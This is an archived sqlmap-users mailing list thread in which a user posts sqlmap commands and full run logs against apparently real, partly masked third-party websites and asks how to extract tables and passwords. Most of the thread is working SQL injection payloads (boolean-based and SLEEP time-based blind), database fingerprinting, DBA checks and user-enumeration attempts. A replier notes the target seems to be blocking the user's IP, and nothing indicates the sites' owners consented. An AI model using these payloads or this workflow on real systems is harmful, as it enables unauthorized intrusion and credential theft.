[sqlmap-users] Re: sqlmap can't retrieve data
From: B. <sto...@qq...> - 2012-11-16 05:59:29

Hi Stampar,

Thanks for your email. I fixed the last problem with your direction.

But another problem has come up. I have found an injection point, but can't retrieve data. Details as follows.

root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://www.xxxx/F/01/product/Products.asp" --data "hidJumpId=54%27%20OR%20%2754%27%3D%2754&JumpButton=Go&JumpPage=22" --param-del="&" --hex -a

    sqlmap/1.0-dev-a40d7a5 - automatic SQL injection and database takeover tool
    http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 13:53:13

[13:53:13] [INFO] resuming back-end DBMS 'mysql'
[13:53:13] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: hidJumpId
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: hidJumpId=54' OR '54'%3D'54' AND 6149=6149 AND 'izAQ'='izAQ&JumpButton=Go&JumpPage=22
---
[13:53:18] [INFO] the back-end DBMS is MySQL
[13:53:18] [INFO] fetching banner
[13:53:18] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[13:53:18] [INFO] retrieved:
[13:53:18] [INFO] heuristics detected web page charset 'ascii'
[13:53:18] [INFO] retrieved:
web server operating system: Windows 2000
web application technology: ASP, Microsoft IIS 5.0
back-end DBMS: MySQL 5
[13:53:18] [INFO] fetching banner
[13:53:19] [INFO] retrieved:
[13:53:19] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' and/or switch '--hex'
banner:    None
[13:53:19] [INFO] fetching current user
[13:53:20] [INFO] retrieved:
current user:    None
[13:53:20] [INFO] fetching current database
[13:53:21] [INFO] retrieved:
current database:    None
[13:53:21] [INFO] fetching server hostname
[13:53:22] [INFO] retrieved:
hostname:    None
[13:53:22] [INFO] testing if current user is DBA
[13:53:22] [INFO] fetching current user
[13:53:22] [INFO] retrieved:
current user is DBA: True
[13:53:23] [INFO] fetching database users
[13:53:23] [INFO] fetching number of database users
[13:53:24] [INFO] retrieved:
[13:53:24] [CRITICAL] unable to retrieve the number of database users

best regards

bob

------------------ Original Message ------------------
From: "Miroslav Stampar" <mir...@gm...>
Sent: Thursday, November 15, 2012, 2:26 PM
To: "Bob" <sto...@qq...>
Subject: Re: [sqlmap-users] Re: sqlmap y/N can't workable

Hi.

You are running sqlmap as a background console process. You can't expect such a process to be able to properly accept the console input you type. This is not an sqlmap issue but yours.

If you want to run more instances of sqlmap at the same time, either open multiple terminals or use some kind of console multiplexer (e.g. screen).

Kind regards,
Miroslav Stampar

On Nov 15, 2012 6:53 AM, "Bob" <sto...@qq...> wrote:

> Hi Iago,
>
> The sqlmap error details are as follows:
>
> [13:32:02] [INFO] testing connection to the target url
> [13:32:06] [INFO] testing if the url is stable, wait a few seconds
> [13:32:11] [INFO] url is stable
> [13:32:11] [INFO] testing if POST parameter 'hidJumpId' is dynamic
> [13:32:12] [INFO] confirming that POST parameter 'hidJumpId' is dynamic
> [13:32:13] [INFO] POST parameter 'hidJumpId' is dynamic
> [13:32:14] [WARNING] reflective value(s) found and filtering out
> [13:32:14] [WARNING] heuristic test shows that POST parameter 'hidJumpId' might not be injectable
> [13:32:14] [INFO] testing for SQL injection on POST parameter 'hidJumpId'
> [13:32:14] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
> [13:32:49] [CRITICAL] connection timed out to the target url or proxy. sqlmap is going to retry the request
> [13:33:04] [INFO] POST parameter 'hidJumpId' is 'AND boolean-based blind - WHERE or HAVING clause' injectable
> [13:33:04] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
> [13:33:34] [CRITICAL] connection timed out to the target url or proxy. sqlmap is going to retry the request
> [13:33:36] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
> [13:33:37] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
> [13:33:37] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
> [13:33:38] [INFO] testing 'MySQL > 5.0.11 stacked queries'
> [13:33:38] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
> [13:33:39] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
> [13:33:39] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
> [13:33:40] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
> [13:33:40] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
> [13:33:41] [INFO] testing 'Oracle AND time-based blind'
> [13:33:42] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
> [13:33:42] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other potential injection technique found
> [13:33:55] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
> [13:33:55] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
> [13:34:08] [INFO] checking if the injection point on POST parameter 'hidJumpId' is a false positive
> [13:34:12] [INFO] heuristics detected web page charset 'ascii'
> POST parameter 'hidJumpId' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
> N: command not found
>
> [4]+ Stopped ./sqlmap.py -u "http://XXXp" --data "hidJumpId=54%27%20OR%20%2754%27%3D%2754&JumpButton=Go&JumpPage=22" --param-del=
>
> [4]+ Stopped ./sqlmap.py -u "http://XXX" --data "hidJumpId=54%27%20OR%20%2754%27%3D%2754&JumpButton=Go&JumpPage=22" --param-del=
>
> ------------------ Original Message ------------------
> From: "Iago Sousa" <146...@gm...>
> Sent: Sunday, June 24, 2012, 12:33 PM
> To: "Bob" <sto...@qq...>
> Cc: "sqlmap-users" <sql...@li...>
> Subject: Re: [sqlmap-users] sqlmap always tell Connection timed out to the target url
>
> I think that the site is blocking your IP address.
>
> On Jun 23, 2012 11:09 PM, "Bob" <sto...@qq...> wrote:
>
> > Hi all,
> >
> > I am using sqlmap to retrieve a database.
> >
> > current-user and current-db work.
> >
> > Retrieving tables, passwords etc. results in a timeout response.
> >
> > Could you tell me what the problem is? How can I retrieve tables and passwords?
> >
> > Thanks
> >
> > bob
> >
> > [09:56:07] [INFO] testing connection to the target url
> > sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
> > ---
> > Place: GET
> > Parameter: c_sn
> >     Type: boolean-based blind
> >     Title: AND boolean-based blind - WHERE or HAVING clause
> >     Payload: c_sn=2' AND 8126=8126 AND 'Cqlm'='Cqlm
> >
> >     Type: AND/OR time-based blind
> >     Title: MySQL > 5.0.11 AND time-based blind
> >     Payload: c_sn=2' AND SLEEP(5) AND 'eKVl'='eKVl
> > ---
> >
> > [09:56:08] [INFO] testing MySQL
> > [09:56:08] [INFO] confirming MySQL
> > [09:56:08] [INFO] the back-end DBMS is MySQL
> > web server operating system: Linux CentOS 5
> > web application technology: Apache 2.2.3, PHP 5.1.6
> > back-end DBMS: MySQL >= 5.0.0
> > [09:56:08] [INFO] fetching current user
> > [09:56:08] [INFO] resumed: keyway_db@localhost
> > current user: 'keyway_db@localhost'
> >
> > [09:56:08] [INFO] fetching database users privileges
> > [09:56:08] [INFO] fetching database users
> > [09:56:08] [INFO] fetching number of database users
> > [09:56:08] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
> > [09:56:08] [INFO] retrieved:
> > [09:57:09] [CRITICAL] connection timed out to the target url or proxy, sqlmap is going to retry the request
> > [09:58:10] [CRITICAL] connection timed out to the target url or proxy, sqlmap is going to retry the request
> > [09:59:11] [CRITICAL] connection timed out to the target url or proxy, sqlmap is going to retry the request
> > [10:00:12] [CRITICAL] connection timed out to the target url or proxy
> >
> > [*] shutting down at 10:00:12
> >
> > _______________________________________________
> > sqlmap-users mailing list
> > sql...@li...
> > https://lists.sourceforge.net/lists/listinfo/sqlmap-users